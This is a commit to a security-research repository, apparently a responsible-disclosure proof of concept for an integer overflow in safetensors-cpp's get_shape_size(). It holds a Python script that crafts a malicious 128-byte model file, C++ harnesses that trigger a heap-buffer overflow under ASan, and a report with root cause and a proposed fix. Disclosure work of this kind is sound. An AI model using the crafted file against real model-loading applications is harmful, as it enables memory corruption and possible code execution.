rez0 committed on
Commit
4c19aea
·
verified ·
1 Parent(s): 76220cd

Upload folder using huggingface_hub

Browse files
Files changed (6) hide show
  1. README.md +32 -0
  2. craft_overflow.py +156 -0
  3. crash_overflow.cc +126 -0
  4. overflow_tensor.safetensors +3 -0
  5. report.md +175 -0
  6. test_overflow.cc +151 -0
README.md ADDED
@@ -0,0 +1,32 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ tags:
3
+ - safetensors
4
+ - security-research
5
+ ---
6
+
7
+ # SafeTensors C++ Integer Overflow PoC
8
+
9
+ **Security Research - Responsible Disclosure via huntr**
10
+
11
+ ## Vulnerability
12
+
13
+ safetensors-cpp `get_shape_size()` multiplies shape dimensions without overflow checking.
14
+ The Rust reference implementation uses `checked_mul` and rejects overflow.
15
+
16
+ The product of shape `[4194305, 4194305, 211106198978564]` wraps modulo 2^64 to 4 elements (16 bytes as F32).
17
+ A consumer that sizes its buffer with `get_shape_size()` allocates 16 bytes, then iterates by the declared dimensions (shape[0] = 4194305) -> heap overflow.
18
+
19
+ ## ASan Result
20
+
21
+ ```
22
+ AddressSanitizer: heap-buffer-overflow WRITE of size 4
23
+ 0x6020000001a0 is located 0 bytes after 16-byte region
24
+ ```
25
+
26
+ ## Reproduction
27
+
28
+ ```bash
29
+ python3 craft_overflow.py
30
+ g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash crash_overflow.cc
31
+ ./crash overflow_tensor.safetensors
32
+ ```
craft_overflow.py ADDED
@@ -0,0 +1,156 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ Craft a malicious .safetensors file that exploits integer overflow in safetensors-cpp.
4
+
5
+ The safetensors format:
6
+ - 8 bytes: header_size as little-endian uint64
7
+ - header_size bytes: JSON header
8
+ - remaining bytes: tensor data
9
+
10
+ The JSON header maps tensor names to {dtype, shape, data_offsets: [start, end]}.
11
+
12
+ VULNERABILITY:
13
+ safetensors-cpp's get_shape_size() multiplies shape dimensions without overflow checking:
14
+ size_t sz = 1;
15
+ for (size_t i = 0; i < t.shape.size(); i++) {
16
+ sz *= t.shape[i]; // NO checked_mul!
17
+ }
18
+
19
+ The Rust reference implementation uses checked_mul and rejects overflow.
20
+
21
+ EXPLOIT:
22
+ Shape [4194305, 4194305, 211106198978564] has true product ~3.7e27
23
+ but overflows uint64 to exactly 4. With F32 (4 bytes/element),
24
+ tensor_size = 16 bytes. Validation passes because data_offsets = [0, 16].
25
+
26
+ A consumer that trusts the shape dimensions (e.g., to allocate a buffer for
27
+ reshaping/processing) would compute 4194305 * 4194305 * 211106198978564 * 4 bytes
28
+ = a colossal allocation, or if they also overflow, get a tiny buffer that they
29
+ then write ~3.7e27 * 4 bytes into -> heap buffer overflow.
30
+ """
31
+
32
+ import json
33
+ import struct
34
+ import sys
35
+ import os
36
+
37
+
38
+ def craft_overflow_safetensors(output_path: str):
39
+ """Create a safetensors file with integer overflow in shape dimensions."""
40
+
41
+ # These shape dimensions overflow uint64 to exactly 4 elements
42
+ # 4194305 * 4194305 * 211106198978564 ≡ 4 (mod 2^64)
43
+ # Each value fits exactly in a double (JSON number)
44
+ shape = [4194305, 4194305, 211106198978564]
45
+
46
+ # F32 = 4 bytes per element
47
+ # Overflowed tensor_size = 4 * 4 = 16 bytes
48
+ data_size = 16
49
+
50
+ # Create the tensor data (16 bytes of actual data)
51
+ tensor_data = b"\x41\x41\x41\x41" * 4 # 16 bytes of 'AAAA' pattern
52
+
53
+ header = {
54
+ "overflow_tensor": {
55
+ "dtype": "F32",
56
+ "shape": shape,
57
+ "data_offsets": [0, data_size]
58
+ }
59
+ }
60
+
61
+ # Serialize header to JSON
62
+ # Use separators to minimize whitespace (matching safetensors convention)
63
+ header_json = json.dumps(header, separators=(',', ':'))
64
+ header_bytes = header_json.encode('utf-8')
65
+
66
+ # Pad header to 8-byte alignment
67
+ pad_len = (8 - len(header_bytes) % 8) % 8
68
+ header_bytes += b' ' * pad_len
69
+
70
+ header_size = len(header_bytes)
71
+
72
+ # Build the file
73
+ file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data
74
+
75
+ with open(output_path, 'wb') as f:
76
+ f.write(file_data)
77
+
78
+ print(f"[+] Written malicious safetensors file: {output_path}")
79
+ print(f" Header size: {header_size} bytes")
80
+ print(f" Header JSON: {header_json}")
81
+ print(f" Total file size: {len(file_data)} bytes")
82
+ print(f" Shape: {shape}")
83
+ print(f" True element count: {shape[0] * shape[1] * shape[2]}")
84
+ print(f" Overflowed element count (mod 2^64): {(shape[0] * shape[1] * shape[2]) % (2**64)}")
85
+ print(f" Overflowed tensor_size (F32, 4 bytes): {((shape[0] * shape[1] * shape[2]) % (2**64)) * 4}")
86
+ print(f" Actual data size: {data_size} bytes")
87
+ print(f" Validation tensor_size == data_size: {((shape[0] * shape[1] * shape[2]) % (2**64)) * 4 == data_size}")
88
+
89
+ return output_path
90
+
91
+
92
+ def craft_normal_safetensors(output_path: str):
93
+ """Create a normal (benign) safetensors file for comparison."""
94
+ shape = [2, 2]
95
+ data_size = 16 # 4 elements * 4 bytes (F32)
96
+ tensor_data = struct.pack('<4f', 1.0, 2.0, 3.0, 4.0)
97
+
98
+ header = {
99
+ "normal_tensor": {
100
+ "dtype": "F32",
101
+ "shape": shape,
102
+ "data_offsets": [0, data_size]
103
+ }
104
+ }
105
+
106
+ header_json = json.dumps(header, separators=(',', ':'))
107
+ header_bytes = header_json.encode('utf-8')
108
+ pad_len = (8 - len(header_bytes) % 8) % 8
109
+ header_bytes += b' ' * pad_len
110
+ header_size = len(header_bytes)
111
+
112
+ file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data
113
+
114
+ with open(output_path, 'wb') as f:
115
+ f.write(file_data)
116
+
117
+ print(f"[+] Written normal safetensors file: {output_path}")
118
+ print(f" Shape: {shape}, data_size: {data_size}")
119
+
120
+
121
+ def test_with_python_safetensors(filepath: str):
122
+ """Test loading with the Python/Rust safetensors implementation."""
123
+ try:
124
+ from safetensors import safe_open
125
+ print(f"\n[*] Testing with Python safetensors (Rust backend)...")
126
+ try:
127
+ with safe_open(filepath, framework="numpy") as f:
128
+ for key in f.keys():
129
+ tensor = f.get_tensor(key)
130
+ print(f" Loaded tensor '{key}': shape={tensor.shape}, dtype={tensor.dtype}")
131
+ print(" Result: LOADED SUCCESSFULLY (unexpected for overflow file)")
132
+ except Exception as e:
133
+ print(f" Result: REJECTED - {type(e).__name__}: {e}")
134
+ except ImportError:
135
+ print("\n[!] Python safetensors not installed, skipping Rust backend test")
136
+
137
+
138
+ if __name__ == "__main__":
139
+ base_dir = os.path.dirname(os.path.abspath(__file__))
140
+
141
+ # Craft the malicious file
142
+ overflow_path = os.path.join(base_dir, "overflow_tensor.safetensors")
143
+ craft_overflow_safetensors(overflow_path)
144
+
145
+ # Craft a normal file for comparison
146
+ normal_path = os.path.join(base_dir, "normal_tensor.safetensors")
147
+ craft_normal_safetensors(normal_path)
148
+
149
+ # Test with Python/Rust implementation
150
+ print("\n" + "=" * 60)
151
+ print("DIFFERENTIAL TEST: Python/Rust safetensors")
152
+ print("=" * 60)
153
+ print("\nNormal file:")
154
+ test_with_python_safetensors(normal_path)
155
+ print("\nOverflow file:")
156
+ test_with_python_safetensors(overflow_path)
crash_overflow.cc ADDED
@@ -0,0 +1,126 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ /**
2
+ * crash_overflow.cc - Demonstrates actual heap corruption via integer overflow
3
+ *
4
+ * This simulates what a real consumer of safetensors-cpp would do:
5
+ * 1. Load a safetensors file
6
+ * 2. Get tensor shape
7
+ * 3. Allocate buffer based on shape size
8
+ * 4. Copy/iterate data using shape dimensions
9
+ *
10
+ * The malicious file has shape dimensions that overflow, so:
11
+ * - Buffer allocation uses overflowed (small) size
12
+ * - Data iteration uses shape dimensions that imply huge size
13
+ * - Result: heap buffer overflow
14
+ *
15
+ * Compile: g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash_overflow crash_overflow.cc
16
+ * Run: ./crash_overflow overflow_tensor.safetensors
17
+ */
18
+
19
+ #include <cstdio>
20
+ #include <cstdint>
21
+ #include <cstdlib>
22
+ #include <cstring>
23
+ #include <fstream>
24
+ #include <vector>
25
+
26
+ #include "safetensors.hh"
27
+
28
+ /**
29
+ * Simulated consumer function: reshape tensor data according to declared shape.
30
+ * This is what ML frameworks typically do after loading a safetensors file.
31
+ */
32
+ void process_tensor(const safetensors::tensor_t &tensor, const uint8_t *data) {
33
+ // A real consumer would use shape to determine iteration bounds
34
+ size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
35
+
36
+ // Compute total elements from shape (uses the SAME vulnerable multiplication)
37
+ size_t total_elements = safetensors::get_shape_size(tensor); // overflows to 4
38
+
39
+ // Allocate output buffer based on computed size
40
+ size_t buf_size = total_elements * dtype_bytes; // 4 * 4 = 16 bytes
41
+ printf(" Allocating buffer: %zu bytes\n", buf_size);
42
+ float *output = (float *)malloc(buf_size);
43
+
44
+ if (!output) {
45
+ printf(" malloc failed\n");
46
+ return;
47
+ }
48
+
49
+ // Copy the data - this is "safe" because both use the same overflowed size
50
+ // But the SHAPE is what matters for downstream processing
51
+ memcpy(output, data + tensor.data_offsets[0], buf_size);
52
+
53
+ printf(" Buffer allocated and filled: %zu bytes\n", buf_size);
54
+
55
+ // NOW: A consumer iterates using shape dimensions for processing
56
+ // e.g., for reshaping, transposing, or element-wise operations
57
+ // This is where the overflow becomes dangerous
58
+ printf(" Shape claims %zu x %zu x %zu = way more than %zu elements\n",
59
+ tensor.shape[0], tensor.shape[1], tensor.shape[2], total_elements);
60
+
61
+ // Demonstrate: iterate first dimension only to show OOB access
62
+ // Even just iterating shape[0] (4194305) exceeds our 4-element buffer
63
+ printf(" Iterating shape[0]=%zu elements (but buffer only has %zu)...\n",
64
+ tensor.shape[0], total_elements);
65
+
66
+ // This writes beyond the allocated buffer -> HEAP OVERFLOW
67
+ // ASan will catch this immediately
68
+ for (size_t i = 0; i < tensor.shape[0] && i < 100; i++) {
69
+ output[i] = 0.0f; // OOB write starting at index 4
70
+ }
71
+
72
+ printf(" OOB write triggered (ASan should report heap-buffer-overflow)\n");
73
+
74
+ free(output);
75
+ }
76
+
77
+ int main(int argc, char *argv[]) {
78
+ const char *filepath = "overflow_tensor.safetensors";
79
+ if (argc > 1) filepath = argv[1];
80
+
81
+ printf("=== safetensors-cpp Heap Overflow Crash PoC ===\n\n");
82
+
83
+ // Load file
84
+ std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
85
+ if (!ifs.is_open()) {
86
+ fprintf(stderr, "Failed to open %s\n", filepath);
87
+ return 1;
88
+ }
89
+ size_t filesize = ifs.tellg();
90
+ ifs.seekg(0);
91
+ std::vector<uint8_t> data(filesize);
92
+ ifs.read(reinterpret_cast<char*>(data.data()), filesize);
93
+ ifs.close();
94
+
95
+ // Parse
96
+ safetensors::safetensors_t st;
97
+ std::string warn, err;
98
+ bool ok = safetensors::load_from_memory(data.data(), data.size(), filepath, &st, &warn, &err);
99
+
100
+ if (!ok) {
101
+ printf("FAILED to load: %s\n", err.c_str());
102
+ return 1;
103
+ }
104
+
105
+ // Validate (this passes due to overflow)
106
+ std::string val_err;
107
+ if (!safetensors::validate_data_offsets(st, val_err)) {
108
+ printf("Validation failed: %s\n", val_err.c_str());
109
+ return 1;
110
+ }
111
+
112
+ printf("[+] File loaded and validated successfully\n");
113
+ printf("[*] Processing tensors...\n\n");
114
+
115
+ // Process each tensor
116
+ for (size_t i = 0; i < st.tensors.size(); i++) {
117
+ std::string key = st.tensors.keys()[i];
118
+ safetensors::tensor_t tensor;
119
+ st.tensors.at(i, &tensor);
120
+
121
+ printf("Processing tensor '%s':\n", key.c_str());
122
+ process_tensor(tensor, st.storage.data());
123
+ }
124
+
125
+ return 0;
126
+ }
overflow_tensor.safetensors ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:6691544f16c7bb866ac0f09317ac7b62581f4597b69bd8b4f88c3818983fb4b5
3
+ size 128
report.md ADDED
@@ -0,0 +1,175 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Integer Overflow in safetensors-cpp Enables Heap Buffer Overflow via Malicious Model Files
2
+
3
+ ## Summary
4
+
5
+ I found an integer overflow vulnerability in safetensors-cpp's `get_shape_size()` function that enables a heap buffer overflow when loading a crafted `.safetensors` model file. The function multiplies tensor shape dimensions using unchecked `size_t` arithmetic, allowing dimensions to overflow to a small value that passes all validation checks. The reference Rust implementation correctly uses `checked_mul` and rejects such files with `SafeTensorError::ValidationOverflow`.
6
+
7
+ A 128-byte malicious `.safetensors` file passes safetensors-cpp's `load_from_memory()` and `validate_data_offsets()` without error. A consuming application that sizes a buffer from the wrapped element count but iterates using the declared shape dimensions will then write past the end of that buffer. This was confirmed with AddressSanitizer against a simulated consumer (`crash_overflow.cc`).
8
+
9
+ ## Attack Preconditions
10
+
11
+ 1. The target application uses safetensors-cpp to load `.safetensors` model files
12
+ 2. The application accepts model files from untrusted sources (e.g., Hugging Face Hub, user uploads, shared model repositories)
13
+ 3. The application uses tensor shape dimensions for buffer allocation, iteration, or processing (standard behavior for ML frameworks)
14
+
15
+ ## Steps to Reproduce
16
+
17
+ ### 1. Create the malicious safetensors file
18
+
19
+ ```python
20
+ # craft_overflow.py
21
+ import json, struct
22
+
23
+ shape = [4194305, 4194305, 211106198978564]
24
+ # True product: ~3.7e27, overflows uint64 to exactly 4
25
+ # With F32 (4 bytes): tensor_size = 16
26
+
27
+ header = {"overflow_tensor": {"dtype": "F32", "shape": shape, "data_offsets": [0, 16]}}
28
+ header_json = json.dumps(header, separators=(',', ':'))
29
+ header_bytes = header_json.encode('utf-8')
30
+ pad_len = (8 - len(header_bytes) % 8) % 8
31
+ header_bytes += b' ' * pad_len
32
+
33
+ with open("overflow_tensor.safetensors", "wb") as f:
34
+ f.write(struct.pack('<Q', len(header_bytes)) + header_bytes + b"\x41" * 16)
35
+ ```
36
+
37
+ ### 2. Verify the Rust reference implementation rejects it
38
+
39
+ ```python
40
+ from safetensors import safe_open
41
+ safe_open("overflow_tensor.safetensors", framework="numpy")
42
+ # Raises: SafetensorError: Error while deserializing header: ValidationOverflow
43
+ ```
44
+
45
+ ### 3. Verify safetensors-cpp accepts it
46
+
47
+ Compile the test program:
48
+ ```bash
49
+ g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -I safetensors-cpp -o test_overflow test_overflow.cc
50
+ ./test_overflow overflow_tensor.safetensors
51
+ ```
52
+
53
+ Output:
54
+ ```
55
+ [+] load_from_memory SUCCEEDED (file parsed without error)
56
+ [*] validate_data_offsets: PASSED
57
+ get_shape_size() = 4 (OVERFLOWED! True value: ~3.7e27)
58
+ tensor_size = 4 * 4 = 16
59
+ tensor_size == data_size? YES (validation passes!)
60
+ ```
61
+
62
+ ### 4. Demonstrate heap buffer overflow with ASan
63
+
64
+ ```bash
65
+ g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -g \
66
+ -I safetensors-cpp -o crash_overflow crash_overflow.cc
67
+ ./crash_overflow overflow_tensor.safetensors
68
+ ```
69
+
70
+ Output:
71
+ ```
72
+ [+] File loaded and validated successfully
73
+ Processing tensor 'overflow_tensor':
74
+ Allocating buffer: 16 bytes
75
+ Shape claims 4194305 x 4194305 x 211106198978564 = way more than 4 elements
76
+ Iterating shape[0]=4194305 elements (but buffer only has 4)...
77
+
78
+ ==33302==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001a0
79
+ WRITE of size 4 at 0x6020000001a0 thread T0
80
+ 0x6020000001a0 is located 0 bytes after 16-byte region [0x602000000190,0x6020000001a0)
81
+ SUMMARY: AddressSanitizer: heap-buffer-overflow crash_overflow.cc:69
82
+ ```
83
+
84
+ ## Root Cause Analysis
85
+
86
+ The vulnerability is in `safetensors.hh` in the `get_shape_size()` function (line ~4616):
87
+
88
+ ```cpp
89
+ size_t get_shape_size(const tensor_t &t) {
90
+ // ...
91
+ size_t sz = 1;
92
+ for (size_t i = 0; i < t.shape.size(); i++) {
93
+ sz *= t.shape[i]; // UNCHECKED MULTIPLICATION - can silently overflow
94
+ }
95
+ return sz;
96
+ }
97
+ ```
98
+
99
+ A second unchecked multiplication occurs in `validate_data_offsets()` (line ~4666):
100
+
101
+ ```cpp
102
+ size_t tensor_size = get_dtype_bytes(tensor.dtype) * get_shape_size(tensor);
103
+ ```
104
+
105
+ The reference Rust implementation uses safe arithmetic that detects overflow:
106
+
107
+ ```rust
108
+ let nelements: usize = info.shape.iter().copied()
109
+ .try_fold(1usize, usize::checked_mul)
110
+ .ok_or(SafeTensorError::ValidationOverflow)?;
111
+ ```
112
+
113
+ ### Why the overflow works
114
+
115
+ The crafted shape `[4194305, 4194305, 211106198978564]` produces:
116
+ - True product: 3,713,821,298,447,761,542,108,676,100 (~3.7 x 10^27)
117
+ - `uint64` maximum: 18,446,744,073,709,551,615 (~1.8 x 10^19)
118
+ - After overflow (mod 2^64): exactly **4**
119
+
120
+ All three values are below 2^53 (9,007,199,254,740,992), ensuring they are exactly representable as JSON double-precision numbers and survive parsing without precision loss.
121
+
122
+ With F32 dtype (4 bytes per element): `tensor_size = 4 * 4 = 16 bytes`
123
+ Setting `data_offsets = [0, 16]` makes `tensor_size == data_size`, so validation passes.
124
+
125
+ ## Remediation
126
+
127
+ Add overflow checking to `get_shape_size()`:
128
+
129
+ ```cpp
130
+ size_t get_shape_size(const tensor_t &t) {
131
+ if (t.shape.empty()) return 1;
132
+ if (t.shape.size() >= kMaxDim) return 0;
133
+
134
+ size_t sz = 1;
135
+ for (size_t i = 0; i < t.shape.size(); i++) {
136
+ if (t.shape[i] != 0 && sz > SIZE_MAX / t.shape[i]) {
137
+ return 0; // overflow would occur
138
+ }
139
+ sz *= t.shape[i];
140
+ }
141
+ return sz;
142
+ }
143
+ ```
144
+
145
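+ Also add overflow checking in `validate_data_offsets()` for the `dtype_bytes * shape_size` multiplication. Note that the `0` returned by `get_shape_size()` on overflow is indistinguishable from a legitimately empty tensor (a shape containing a zero dimension), so the overflow should additionally be reported as a validation error (e.g. via a separate flag); otherwise an overflowing shape paired with an empty `data_offsets` range would still validate: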
146
+
147
+ ```cpp
148
+ size_t shape_size = get_shape_size(tensor);
149
+ size_t dtype_bytes = get_dtype_bytes(tensor.dtype);
150
+ if (shape_size != 0 && dtype_bytes > SIZE_MAX / shape_size) {
151
+ ss << "Tensor size overflow for '" << key << "'\n";
152
+ valid = false;
153
+ continue;
154
+ }
155
+ size_t tensor_size = dtype_bytes * shape_size;
156
+ ```
157
+
158
+ ## References
159
+
160
+ - safetensors-cpp: https://github.com/syoyo/safetensors-cpp
161
+ - Rust reference (with checked_mul): https://github.com/huggingface/safetensors/blob/main/safetensors/src/tensor.rs
162
+ - Trail of Bits audit of safetensors: https://huggingface.co/docs/safetensors/en/audit_results
163
+ - CWE-190: Integer Overflow or Wraparound: https://cwe.mitre.org/data/definitions/190.html
164
+
165
+ ## Impact
166
+
167
+ This vulnerability allows an attacker to craft a malicious `.safetensors` model file that:
168
+
169
+ 1. **Passes all validation** in safetensors-cpp (load + validate_data_offsets)
170
+ 2. **Is rejected** by the Rust reference implementation (cross-implementation differential)
171
+ 3. **Causes heap buffer overflow** in any consuming application that uses shape dimensions for memory operations
172
+
173
+ The attack surface is significant because `.safetensors` is the primary model format for Hugging Face models. Any C++ application loading models from untrusted sources (model hubs, user uploads, federated learning) is vulnerable. The malicious file is only 128 bytes and indistinguishable from a legitimate safetensors file without overflow-aware validation.
174
+
175
+ Severity: **High** (CWE-190 leading to heap overflow / potential RCE in C++ applications)
test_overflow.cc ADDED
@@ -0,0 +1,151 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ /**
2
+ * test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
3
+ *
4
+ * This program loads a malicious .safetensors file where shape dimensions
5
+ * are crafted to overflow uint64 multiplication in get_shape_size().
6
+ *
7
+ * The file passes safetensors-cpp validation because:
8
+ * shape = [4194305, 4194305, 211106198978564]
9
+ * get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
10
+ * tensor_size = 4 * sizeof(F32) = 16 bytes
11
+ * data_offsets = [0, 16] -> data_size = 16 bytes
12
+ * tensor_size == data_size -> VALIDATION PASSES
13
+ *
14
+ * But the declared shape claims ~3.7 * 10^27 elements.
15
+ *
16
+ * IMPACT: Any code that trusts the shape for buffer allocation or iteration
17
+ * will either:
18
+ * (a) Attempt a massive allocation (DoS / OOM)
19
+ * (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow)
20
+ * (c) Iterate over wrong number of elements, causing OOB reads
21
+ *
22
+ * Compile: g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -I safetensors-cpp -o test_overflow test_overflow.cc
23
+ */
24
+
25
+ #include <cstdio>
26
+ #include <cstdint>
27
+ #include <cstdlib>
28
+ #include <cstring>
29
+ #include <fstream>
30
+ #include <vector>
31
+ #include <iostream>
32
+ #include <limits>
33
+
34
+ #include "safetensors.hh"
35
+
36
+ int main(int argc, char *argv[]) {
37
+ const char *filepath = "overflow_tensor.safetensors";
38
+ if (argc > 1) {
39
+ filepath = argv[1];
40
+ }
41
+
42
+ printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");
43
+
44
+ // Read file into memory
45
+ std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
46
+ if (!ifs.is_open()) {
47
+ fprintf(stderr, "Failed to open %s\n", filepath);
48
+ return 1;
49
+ }
50
+ size_t filesize = ifs.tellg();
51
+ ifs.seekg(0);
52
+ std::vector<uint8_t> data(filesize);
53
+ ifs.read(reinterpret_cast<char*>(data.data()), filesize);
54
+ ifs.close();
55
+
56
+ printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);
57
+
58
+ // Parse with safetensors-cpp
59
+ safetensors::safetensors_t st;
60
+ std::string warn, err;
61
+
62
+ bool ok = safetensors::load_from_memory(data.data(), data.size(),
63
+ filepath, &st, &warn, &err);
64
+
65
+ if (!ok) {
66
+ printf("[!] load_from_memory FAILED: %s\n", err.c_str());
67
+ return 1;
68
+ }
69
+
70
+ if (!warn.empty()) {
71
+ printf("[!] Warnings: %s\n", warn.c_str());
72
+ }
73
+
74
+ printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");
75
+
76
+ // Validate data offsets (this is the check that should catch overflow)
77
+ std::string val_err;
78
+ bool valid = safetensors::validate_data_offsets(st, val_err);
79
+ printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
80
+ if (!valid) {
81
+ printf(" Error: %s\n", val_err.c_str());
82
+ }
83
+
84
+ // Examine the tensor
85
+ for (size_t i = 0; i < st.tensors.size(); i++) {
86
+ std::string key = st.tensors.keys()[i];
87
+ safetensors::tensor_t tensor;
88
+ st.tensors.at(i, &tensor);
89
+
90
+ printf("\n[*] Tensor: '%s'\n", key.c_str());
91
+ printf(" dtype: F32\n");
92
+ printf(" shape: [");
93
+ for (size_t j = 0; j < tensor.shape.size(); j++) {
94
+ if (j > 0) printf(", ");
95
+ printf("%zu", tensor.shape[j]);
96
+ }
97
+ printf("]\n");
98
+ printf(" data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);
99
+
100
+ // Show the overflow
101
+ size_t shape_size = safetensors::get_shape_size(tensor);
102
+ size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
103
+ size_t tensor_size = dtype_bytes * shape_size;
104
+
105
+ printf("\n [OVERFLOW ANALYSIS]\n");
106
+ printf(" get_shape_size() = %zu (OVERFLOWED! True value: ~3.7e27)\n", shape_size);
107
+ printf(" get_dtype_bytes() = %zu\n", dtype_bytes);
108
+ printf(" tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
109
+ printf(" data_size = %zu\n", tensor.data_offsets[1] - tensor.data_offsets[0]);
110
+ printf(" tensor_size == data_size? %s\n",
111
+ tensor_size == (tensor.data_offsets[1] - tensor.data_offsets[0]) ? "YES (validation passes!)" : "NO");
112
+
113
+ // Demonstrate the danger: a naive consumer trusting shape
114
+ printf("\n [IMPACT DEMONSTRATION]\n");
115
+ printf(" A consumer that trusts shape dimensions would compute:\n");
116
+ printf(" shape[0] * shape[1] * shape[2] = ");
117
+
118
+ // Use __int128 or manual check to show the true product
119
+ __uint128_t true_product = (__uint128_t)tensor.shape[0] * tensor.shape[1] * tensor.shape[2];
120
+ printf("OVERFLOW (too large for uint64)\n");
121
+ printf(" True product > UINT64_MAX: %s\n",
122
+ true_product > ((__uint128_t)UINT64_MAX) ? "YES" : "NO");
123
+
124
+ // Simulate what a consumer would do
125
+ printf("\n [SIMULATED CONSUMER BEHAVIOR]\n");
126
+
127
+ // Scenario 1: Consumer uses shape for allocation (overflows to small buffer)
128
+ size_t alloc_size = 1;
129
+ for (size_t j = 0; j < tensor.shape.size(); j++) {
130
+ alloc_size *= tensor.shape[j]; // Same overflow!
131
+ }
132
+ alloc_size *= dtype_bytes;
133
+ printf(" Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
134
+ printf(" Consumer thinks tensor has: %zu * %zu * %zu = ~3.7e27 elements\n",
135
+ tensor.shape[0], tensor.shape[1], tensor.shape[2]);
136
+
137
+ // Show it: allocate the overflowed-size buffer, then show what happens
138
+ // when iterating over shape dimensions
139
+ printf("\n If consumer allocates %zu bytes but iterates shape[0]*shape[1]*shape[2] times:\n", alloc_size);
140
+ printf(" -> HEAP BUFFER OVERFLOW (writing ~3.7e27 * 4 bytes into %zu byte buffer)\n", alloc_size);
141
+ printf(" This is a critical memory safety vulnerability.\n");
142
+ }
143
+
144
+ printf("\n=== DIFFERENTIAL RESULT ===\n");
145
+ printf(" Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
146
+ printf(" C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
147
+ printf(" Impact: A model file that Rust deems invalid is accepted by C++\n");
148
+ printf(" The shape values cause integer overflow, enabling heap corruption\n");
149
+
150
+ return 0;
151
+ }